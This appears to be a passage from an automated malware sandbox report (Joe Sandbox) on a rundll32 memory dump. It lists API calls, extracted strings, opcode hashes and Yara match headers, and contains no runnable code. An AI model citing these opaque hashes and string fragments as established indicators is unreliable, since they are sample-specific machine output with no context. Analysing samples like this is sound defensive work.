                  • String ID: $$=$?$DD?ljh$Lnotadirectory$P56$[$b$}g:F
                  • API String ID: 2831631499-1124839101
                  • Opcode ID: 1e222802676e2cc7d4b511b3a32b4b5398a96e9a30a5840142f01c7fd6f918f1
                  • Instruction ID: 4f0d85795e5d933e3ff788293eea50f16ecc96ac1457a5a22d20e031bc25f725
                  • Opcode Fuzzy Hash: 1e222802676e2cc7d4b511b3a32b4b5398a96e9a30a5840142f01c7fd6f918f1
                  • Instruction Fuzzy Hash: 6BC29879D0426CCADB18CF6AC8907EDBBB6BF48300F20859AD449F7269D7749A84CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6$9$DD?ljh$L%$T$U$w$w
                  • API String ID: 0-2402412767
                  • Opcode ID: e662212af0f4544d594853511d639866dd67ecc281b0c44eacad2840aaaa8404
                  • Instruction ID: 794c391cd4e34aa081325434636436d8600053d2b6f1e6aab1ad1e6b034a4980
                  • Opcode Fuzzy Hash: e662212af0f4544d594853511d639866dd67ecc281b0c44eacad2840aaaa8404
                  • Instruction Fuzzy Hash: DA62A079D09398CADB14CFAAC8907BEBBF5AF49300F24899AE445E72A6D7344944CF11
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: f9e14efd0ded9b00b067d5b93e5ccab8e6431ff438d9bb6ffea89bf6d5a615e0
                  • Instruction ID: f0d2993464054364c6455853b4be335b22f84c576005f1d67807a472a2de7e21
                  • Opcode Fuzzy Hash: f9e14efd0ded9b00b067d5b93e5ccab8e6431ff438d9bb6ffea89bf6d5a615e0
                  • Instruction Fuzzy Hash: 2FD22675E1822A8BDB25CE24DD40BDAB7B5FF44344F1449EAD90EE7240E774AA91CF80
                  APIs
                  • GetModuleHandleA.KERNEL32(comdlg32), ref: 7EDFAF37
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: HandleModule
                  • String ID: DD?ljh$RPj$comdlg32$jjj
                  • API String ID: 4139908857-2877190633
                  • Opcode ID: 4b7be7fea6aa5f78b7cdc1ecbc4c3c50d6637b69ee1965fe85944ee7582cf0e6
                  • Instruction ID: cc68ebfbc60571be370de41c6e749548611fe449b28808c92810ea449f9a0aac
                  • Opcode Fuzzy Hash: 4b7be7fea6aa5f78b7cdc1ecbc4c3c50d6637b69ee1965fe85944ee7582cf0e6
                  • Instruction Fuzzy Hash: B8225879D04268CBDB14CF6AC890BEEBBF6BF88304F20859AE459E7255D7345A81CF11
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$DD?ljh$E$Lnotadirectory$P$Q$Q
                  • API String ID: 0-3985465296
                  • Opcode ID: 2f9406c67da6a73884ef7676d34ec74186fd7ec80403ed22feb4e174630356f2
                  • Instruction ID: d6c5f13f3ce9fb0bfa921e5df2dfe5ba1cbf37241da6d48383a7f30d425ad508
                  • Opcode Fuzzy Hash: 2f9406c67da6a73884ef7676d34ec74186fd7ec80403ed22feb4e174630356f2
                  • Instruction Fuzzy Hash: 71225B79D0476CCBCB15CF6AC8907ADBBB9BB88300F20899AE449E3365D7745A80CF55
                  APIs
                  • GetLocaleInfoW.KERNEL32(?,2000000B,7EE1D208,00000002,00000000,?,?,?,7EE1D208,?,00000000), ref: 7EE1CF83
                  • GetLocaleInfoW.KERNEL32(?,20001004,7EE1D208,00000002,00000000,?,?,?,7EE1D208,?,00000000), ref: 7EE1CFAC
                  • GetACP.KERNEL32(?,?,7EE1D208,?,00000000), ref: 7EE1CFC1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID: ACP$OCP
                  • API String ID: 2299586839-711371036
                  • Opcode ID: 22cac35844674d0e94aa73c92c612b17770ed593487288e59e8da90b0d3e462b
                  • Instruction ID: 7ca4e0739f465f17e7ab8a5adefc3bbe37826151e3c43a394b09c8444e206aea
                  • Opcode Fuzzy Hash: 22cac35844674d0e94aa73c92c612b17770ed593487288e59e8da90b0d3e462b
                  • Instruction Fuzzy Hash: C721627A620187AAD72A9F55CA05B8773F7BB48E58B568C14F90BD7108E732D9C1C350
                  APIs
                  • GetACP.KERNEL32(?,?,?,?,?,?,7EE14DA2,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7EE1C81C
                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7EE14DA2,?,?,?,00000055,?,-00000050,?,?), ref: 7EE1C847
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7EE1C9AA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeInfoLocalePageValid
                  • String ID: utf8
                  • API String ID: 790303815-905460609
                  • Opcode ID: 15d8e8dcc46fa7aad731f6dc50b98c5f40074de3ba1309e68ddbae3088d98469
                  • Instruction ID: 4f2f7ceb47b4303705bdbb4beba0ecd8868d7ba31b3ab7deee4c02766f596784
                  • Opcode Fuzzy Hash: 15d8e8dcc46fa7aad731f6dc50b98c5f40074de3ba1309e68ddbae3088d98469
                  • Instruction Fuzzy Hash: 5271137A615607AAD7199B79CD81BAA73BCEF04714F114C29E906DB180EB70E8C0C7A0
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Popup
                  • String ID: DD?ljh$Lnotadirectory
                  • API String ID: 3418901340-1299198310
                  • Opcode ID: eb6b0d2dd6b0fb39e08368270b7d019f39b0ad4879e1f2892a076aa34236f46c
                  • Instruction ID: 9d6bdd986ae1c1e9608d9ccdb1ff88a2def8f78b0d2f1ab58bd6e48117f4a9d9
                  • Opcode Fuzzy Hash: eb6b0d2dd6b0fb39e08368270b7d019f39b0ad4879e1f2892a076aa34236f46c
                  • Instruction Fuzzy Hash: 65827C7AD04258CEDB14CFAAC8907EDBBF6BF48304F24899AE445E7269D7345980CF51
                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EE03893
                  • IsDebuggerPresent.KERNEL32 ref: 7EE0395F
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EE03978
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 7EE03982
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                  • String ID:
                  • API String ID: 254469556-0
                  • Opcode ID: 1109e45f35f59a7f6e968589a10907d0c00be317888fa9d47600627660cbe514
                  • Instruction ID: f062fac775b2859632baaaa6d1958e8ecf83f99216dddc06e166f40642dd73aa
                  • Opcode Fuzzy Hash: 1109e45f35f59a7f6e968589a10907d0c00be317888fa9d47600627660cbe514
                  • Instruction Fuzzy Hash: 4831F879D0521D9BDF21DFA5C949BCDBBB8AF08300F2055AAE40DAB244EB719B84CF45
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,$:FailedAddIndicator$Lnotadirectory$g
                  • API String ID: 0-1694924533
                  • Opcode ID: cadbc4f767aa6a514ace2ac1e5b87cb5e1fe32f47535364e46401aa49cd8c8fb
                  • Instruction ID: 9695015aa3872e900c314b55d25825fd2e8c3e72859cfff92057f7c5c0de2c7d
                  • Opcode Fuzzy Hash: cadbc4f767aa6a514ace2ac1e5b87cb5e1fe32f47535364e46401aa49cd8c8fb
                  • Instruction Fuzzy Hash: B282AD799043ACCADB15CFAAC8987ADBBF5BF49304F24899AD449E7365D3344A80CF11
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %$,$6$d
                  • API String ID: 0-744794572
                  • Opcode ID: f6ff82101c165a71d23a9cb5200177710dd1d6e3b20ddfa8f2580603881da36b
                  • Instruction ID: 24aba88f4a91b8e82d94f12ca83523e5cc94a2bf586b5376a25a99f009d468cd
                  • Opcode Fuzzy Hash: f6ff82101c165a71d23a9cb5200177710dd1d6e3b20ddfa8f2580603881da36b
                  • Instruction Fuzzy Hash: BB12AD78E04269CFDB25CF98C890BDDBBB2BF49304F14819AD859AB355D730AA85CF50
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000174F), ref: 7EE0780B
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000174F), ref: 7EE07815
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000174F), ref: 7EE07822
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 2c7efe3a1bf5a5df058bcfba6088e74b13e2740650f666e44489eebf301b9300
                  • Instruction ID: 7537d341b290859ce55335be5c98688bf71592038969d9dcdc637ab06882b944
                  • Opcode Fuzzy Hash: 2c7efe3a1bf5a5df058bcfba6088e74b13e2740650f666e44489eebf301b9300
                  • Instruction Fuzzy Hash: 2D31C67591122C9BCB21DF69D988BDDB7B8BF08310F6045EAE40DA7250E7709B85CF54
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: @$@$PE
                  • API String ID: 0-2458287169
                  • Opcode ID: 43d951260e1a790eda90719426f8018edc137e544ed2f91c09afa2c7a15ceadc
                  • Instruction ID: 7787fa6a3377607d98a200018d5e18061c2fbafc6d26483d6a91b61109a97a20
                  • Opcode Fuzzy Hash: 43d951260e1a790eda90719426f8018edc137e544ed2f91c09afa2c7a15ceadc
                  • Instruction Fuzzy Hash: F1529278E05229CFDB24CF99C990BDDBBB2BF49304F108199D849AB345E735AA85CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$DD?ljh$M
                  • API String ID: 0-3870596802
                  • Opcode ID: c30286c9e4ce3a0bb889b57e54b000180850bbf6ec4a36e217cd134e8250b142
                  • Instruction ID: 24d75399ad5549e8eaed8249a98c761c331c121e6e2a3db58946c5ed0ef6260f
                  • Opcode Fuzzy Hash: c30286c9e4ce3a0bb889b57e54b000180850bbf6ec4a36e217cd134e8250b142
                  • Instruction Fuzzy Hash: FF328E79D04268CECB18CFAAC8947BEBBF6BB89300F14899AD449F7255D7345A80CF51
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ace3571a612d86a6ff7eb72445ee9492430b93b8b50c8421e04897602cc7f77
                  • Instruction ID: a71345135a5c0ebadae49734fba9dfc3238486d7485326fb8b8773b28b1f0804
                  • Opcode Fuzzy Hash: 7ace3571a612d86a6ff7eb72445ee9492430b93b8b50c8421e04897602cc7f77
                  • Instruction Fuzzy Hash: 83F16175E1021D9FDB15CFA8C980A9DB7B2FF88314F25866DD81AAB394D730A941CF90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$DD?ljh
                  • API String ID: 0-2868022954
                  • Opcode ID: 7bb4bc0421f9c02e6238c748d8a2d83829db7399119448bc45fae05dcab6bc7e
                  • Instruction ID: b364d5958c92722fc3d83f58b5798419ed1921d29bec572200547dc415d16d49
                  • Opcode Fuzzy Hash: 7bb4bc0421f9c02e6238c748d8a2d83829db7399119448bc45fae05dcab6bc7e
                  • Instruction Fuzzy Hash: BA027979D08268CACB14CFAAC8917BEBBF5BF48301F14859AE459B7259D7385A80CF11
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 56103d63a10e57f78e2f33c685348b1f135fb12119e48378e47c0147da923ab6
                  • Instruction ID: 886f8d934f8ff3e2c01f79072f0f3ced45608af0b49ad303803a7d5a336646a1
                  • Opcode Fuzzy Hash: 56103d63a10e57f78e2f33c685348b1f135fb12119e48378e47c0147da923ab6
                  • Instruction Fuzzy Hash: 89F2ACB8E046698FCB69CF58C890BD9BBB1BF89304F1081DAD949A7345D730AE85CF54
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 9562eb38446bed7ff9e75e9bc9b22ba28a767a4a549c2119e00561405a075ba9
                  • Instruction ID: 64c8c37034d8beffe3e6f568d53472c3fb177449d7c12168fcd081cb3ee5d3f4
                  • Opcode Fuzzy Hash: 9562eb38446bed7ff9e75e9bc9b22ba28a767a4a549c2119e00561405a075ba9
                  • Instruction Fuzzy Hash: EDA2ACB8E052698FCB6ACF58C890BDDBBB5BF48304F1081DAD949A7345D730AA85CF54
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: aad1c99e89b218e4fedafa1ceac3405a19d824ecd93472f944a755cd97af764f
                  • Instruction ID: 11990a16cfd3adec79def07043e795d2cc5fe60f6fee9e2cf6d2ae1e9b8546c1
                  • Opcode Fuzzy Hash: aad1c99e89b218e4fedafa1ceac3405a19d824ecd93472f944a755cd97af764f
                  • Instruction Fuzzy Hash: 67A29B78E052698FDB68CF59C894BDDBBB1BF89304F1082DAD849A7355D730AA81CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 963ecd052bfaf1cc60ccd79ee345eecf589608e92faee3992425d6120c6e099e
                  • Instruction ID: 6dd6838f8d55b89a017671224640d4cb36a683ef30ccb3e085f717e4a22913f5
                  • Opcode Fuzzy Hash: 963ecd052bfaf1cc60ccd79ee345eecf589608e92faee3992425d6120c6e099e
                  • Instruction Fuzzy Hash: 1D92AEB8E052688FCB69CF58C890BDDBBB5BF49304F1081DAD949A7345DB30AA85CF54
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7EE13A78,?,?,00000008,?,?,7EE22FB5,00000000), ref: 7EE13CAA
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: 87637fbaefe923370e485a8847351adc74fa6c6a4f6f96fdd22ec221c83eee6f
                  • Instruction ID: 09a5e088453c3f42d3a4e25fe0054863d2451b4cdd7793c72a7862a8da2ffa59
                  • Opcode Fuzzy Hash: 87637fbaefe923370e485a8847351adc74fa6c6a4f6f96fdd22ec221c83eee6f
                  • Instruction Fuzzy Hash: 54B16E7922060ACFD715CF28C496B557BF1FF05369F268A58E89ACF2A1D335E981CB40
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aullrem
                  • String ID: N/A
                  • API String ID: 3758378126-2525114547
                  • Opcode ID: 9faa855dccd912263dfe5f76458b1adf499a2d1f75355e2f244c01b427ab6e9f
                  • Instruction ID: e5dc9b8f38048d0bce51aa2123d68904439fad72912d2126310b2172962e7716
                  • Opcode Fuzzy Hash: 9faa855dccd912263dfe5f76458b1adf499a2d1f75355e2f244c01b427ab6e9f
                  • Instruction Fuzzy Hash: 0D529D78E052688FDB65CF99C990BDDBBB2BF49304F1481DAD849AB345D730AA81CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 9ad14793c01850e8fec39b24e69e2c0aaadad5ba1755685ad9d3e4be1e6bd1df
                  • Instruction ID: da91391456ce613236cbeb4edb97c9dd37019796bfa6ed1c2d92234a974dae47
                  • Opcode Fuzzy Hash: 9ad14793c01850e8fec39b24e69e2c0aaadad5ba1755685ad9d3e4be1e6bd1df
                  • Instruction Fuzzy Hash: DF429FB8D042688FCB65CF58C890BDDBBB6BB89304F1081DAD949A7355DB30AB85CF54
                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7EE03652
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FeaturePresentProcessor
                  • String ID:
                  • API String ID: 2325560087-0
                  • Opcode ID: cae1648092d5ebdfa2431e7cb694ad3e7b10acfb0c39def4c5f810000bb26573
                  • Instruction ID: 7dd6ff1ea250ae90b7a68300c9039856ce75de52d9293f306665585a6d581ac2
                  • Opcode Fuzzy Hash: cae1648092d5ebdfa2431e7cb694ad3e7b10acfb0c39def4c5f810000bb26573
                  • Instruction Fuzzy Hash: AC519FBA9112098FDB05CF96C68179EBBF9FB44304F31896AD407EB255D374D910CB90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: @
                  • API String ID: 0-2766056989
                  • Opcode ID: 059b494ea666779c0e65de4deb29babeb081e4a2cd2d7375b7ad6fd0a2cf4dd9
                  • Instruction ID: 4dd7a37843522339ad8f89ac74dc74143186ad549cfd409295927687a0cfee78
                  • Opcode Fuzzy Hash: 059b494ea666779c0e65de4deb29babeb081e4a2cd2d7375b7ad6fd0a2cf4dd9
                  • Instruction Fuzzy Hash: 8522BD78D05268CFCB25CF98C990BDDBBB1BF49304F14819AD84AAB355D734AA85CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 796f2b3a10b5faebbf4612636bcc62fff9a3cfe1e6757bc89f9f0e7f501cbef6
                  • Instruction ID: 651746b542b8af09fbfcfbc3d469745a621a7459d6fd2caf7f7c356988b8a4ed
                  • Opcode Fuzzy Hash: 796f2b3a10b5faebbf4612636bcc62fff9a3cfe1e6757bc89f9f0e7f501cbef6
                  • Instruction Fuzzy Hash: 5BE1BC386106068FCB25CF68C5D0AAEB3B2FF49318B304E5DD4579B299D730A9A6CB51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0h~
                  • API String ID: 0-2614996996
                  • Opcode ID: 445794ab2ffc3a12680a63ab2d2e9f0c891d9fdfe528c45564c904988b60341a
                  • Instruction ID: 628db4e6f31701124c165492634d1ddb2d3cb7b3a0af7241ebe88163b3c2d48c
                  • Opcode Fuzzy Hash: 445794ab2ffc3a12680a63ab2d2e9f0c891d9fdfe528c45564c904988b60341a
                  • Instruction Fuzzy Hash: 2AC102389246468FCB16CF68C5E0AAEB7B6BF45318F344E19D88397294C730E875CB91
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: bee92206f362feaab65b0c1f533078a1ba258c571684bd7c9efb08f12949e999
                  • Instruction ID: b084a983230a5e7069255bff9ae880eb123639de7b323adbee56d93b32052b2a
                  • Opcode Fuzzy Hash: bee92206f362feaab65b0c1f533078a1ba258c571684bd7c9efb08f12949e999
                  • Instruction Fuzzy Hash: 7FB1C238A1060A8FCB15CFA4C5E0AAEB7F6BF48208F344D19D457A7294E770A976CF51
                  APIs
                  • EnumSystemLocalesW.KERNEL32(7EE1CB6E,00000001,00000000,?,-00000050,?,7EE1D19F,00000000,?,?,?,00000055,?), ref: 7EE1CABA
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: beecbac04da7a58544ad0cc68172149ebb6494693b01d1b20508563ffc8e2068
                  • Instruction ID: 482197e77e4806e72e04fa07f8440c728d706bf5b5acba1bed01f968dd7345b5
                  • Opcode Fuzzy Hash: beecbac04da7a58544ad0cc68172149ebb6494693b01d1b20508563ffc8e2068
                  • Instruction Fuzzy Hash: 9C11023A2147025FDB1C9F39C8906AAB7A2FB80358B194D2DDA8787B40E371B582D740
                  APIs
                  • EnumSystemLocalesW.KERNEL32(7EE1CDC1,00000001,00000001,?,-00000050,?,7EE1D163,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7EE1CB2D
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: d41e244c21c51eb4c78d4c519bbc62855ae32ddfb2af12913ff44bf76a251ce0
                  • Instruction ID: e905d6be306dbb0a23eac63079727e530acf9aa7b3d23e55921b01e729ff36e6
                  • Opcode Fuzzy Hash: d41e244c21c51eb4c78d4c519bbc62855ae32ddfb2af12913ff44bf76a251ce0
                  • Instruction Fuzzy Hash: 34F0463A2143051FC7094F39C880E6ABBA5EF8032CB158D2CE906CB640D771A8C2C740
                  APIs
                  • EnumSystemLocalesW.KERNEL32(7EE1C956,00000001,00000001,?,?,7EE1D1C1,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7EE1CA34
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: 12fda92abd9512c5b9814b2dd598fa22645093df4e335666b58824213e1ebbc5
                  • Instruction ID: d77751f41bd646e7f6275d1218f0e8362acf06f50ac9bee6450c5e9f471b57bb
                  • Opcode Fuzzy Hash: 12fda92abd9512c5b9814b2dd598fa22645093df4e335666b58824213e1ebbc5
                  • Instruction Fuzzy Hash: 29F0E53E30020657CB09DF7AD85866ABFA5EFC1654B0B4859EE1ACB341D63198C2C794
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7EE15908,?,20001004,00000000,00000002,?,?,7EE14F0A), ref: 7EE16850
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 35f08a253956de50bfedac962bdf7cc3aa7fcb2b11e314e397babe0b826a42d1
                  • Instruction ID: 0a2e9e516241fc2a3dedb6f554422e083b19f448ac9a8322a08fa19f0c629774
                  • Opcode Fuzzy Hash: 35f08a253956de50bfedac962bdf7cc3aa7fcb2b11e314e397babe0b826a42d1
                  • Instruction Fuzzy Hash: BAE04F3A50152ABBCF121F62DD08F9E3F2AFF44790F014820FD0566221CB3289A0AAD5
                  Strings
                  Memory Dump Source
